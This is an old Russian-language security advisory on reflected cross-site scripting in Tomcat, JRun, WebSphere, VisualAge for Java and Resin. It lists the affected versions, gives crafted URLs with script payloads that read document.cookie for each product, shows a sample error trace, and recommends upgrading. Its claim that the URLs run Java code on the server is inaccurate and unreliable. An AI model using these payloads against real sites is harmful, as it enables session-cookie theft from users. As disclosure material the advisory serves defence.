Security Lab

cross-site scripting в различных продуктах JAVA

Дата публикации:02.07.2001
Дата изменения:17.10.2006
Всего просмотров:1909
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Напомню, что Microsoft в августе прошлого года выпустила патч, закрывающий дырку IIS cross-site scripting. Теперь найдена похожая уязвимость в различных производителей JAVA:

Tomcat 3.2.1, 3.2.2-beta, 4.0-beta

<http://jakarta.apache.org/tomcat/>

JRun 3.0

<http://www.allaire.com/products/jrun/index.cfm>

WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional

<http://www-4.ibm.com/software/webservers/>

Resin

<http://www.caucho.com/products/resin/>



Проблема состоит в том, что определенно построенный URL позволяет выполнить некоторый JAVA код на сервере:



Tomcat 3.2.1:

http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

JRun 3.0:

http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml

http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml

WebSphere 3.5 FP2:

http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>

WebSphere 3.02:

http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

VisualAge for Java 3.5 Professional:

http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>

Resin 1.2.2:

http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp



В результате чего мы получим что-то типа такого:



An error has occurred while processing request:

http://WebSphere/webapp/examples/******



Message: File not found: //******

StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //******

at javax.servlet.ServletException.<init>(ServletException.java:107)

at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)

at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)

at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)



Для устранения скачайте последние версии продуктов.

Более подробно о проблеме cross-site scripting, можно прочитать здесь:

<http://www.cert.org/advisories/CA-2000-02.html>

<http://www.microsoft.com/TechNet/security/crssite.asp>

<http://www.apache.org/info/css-security/>